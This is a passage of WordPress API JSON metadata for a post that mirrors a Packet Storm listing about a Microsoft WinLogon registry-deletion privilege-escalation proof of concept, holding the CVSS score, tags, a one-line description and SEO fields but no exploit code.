============================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/219937&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.8,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/219937\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-28T17:32:20&#8243;,&#8221;description&#8221;:&#8221;This code represents a highly destructive proof of concept targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise&#8230;.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-49971","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Microsoft WinLogon Registry Deletion \/ Privilege Escalation_PACKETSTORM:219937 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=49971\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft WinLogon Registry Deletion \/ Privilege Escalation_PACKETSTORM:219937 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-28T17:32:20&#8243;,&#8221;description&#8221;:&#8221;This code represents a highly destructive proof of concept targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise....\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=49971\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-28T13:52:46+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"14 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49971#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49971\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft WinLogon Registry Deletion \\\/ Privilege Escalation_PACKETSTORM:219937\",\"datePublished\":\"2026-04-28T13:52:46+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49971\"},\"wordCount\":2728,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=49971#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49971\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49971\",\"name\":\"\ud83d\udcc4 Microsoft WinLogon Registry Deletion \\\/ Privilege Escalation_PACKETSTORM:219937 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-28T13:52:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49971#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=49971\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=49971#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft WinLogon Registry Deletion \\\/ Privilege Escalation_PACKETSTORM:219937\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft WinLogon Registry Deletion \/ Privilege Escalation_PACKETSTORM:219937 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=49971","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft WinLogon Registry Deletion \/ Privilege Escalation_PACKETSTORM:219937 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-28T17:32:20&#8243;,&#8221;description&#8221;:&#8221;This code represents a highly destructive proof of concept targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise....","og_url":"https:\/\/zero.redgem.net\/?p=49971","og_site_name":"zero redgem","article_published_time":"2026-04-28T13:52:46+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"14 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=49971#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=49971"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft WinLogon Registry Deletion \/ Privilege Escalation_PACKETSTORM:219937","datePublished":"2026-04-28T13:52:46+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=49971"},"wordCount":2728,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=49971#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=49971","url":"https:\/\/zero.redgem.net\/?p=49971","name":"\ud83d\udcc4 Microsoft WinLogon Registry Deletion \/ Privilege Escalation_PACKETSTORM:219937 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-28T13:52:46+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=49971#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=49971"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=49971#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft WinLogon Registry Deletion \/ Privilege Escalation_PACKETSTORM:219937"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/49971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=49971"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/49971\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=49971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=49971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=49971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}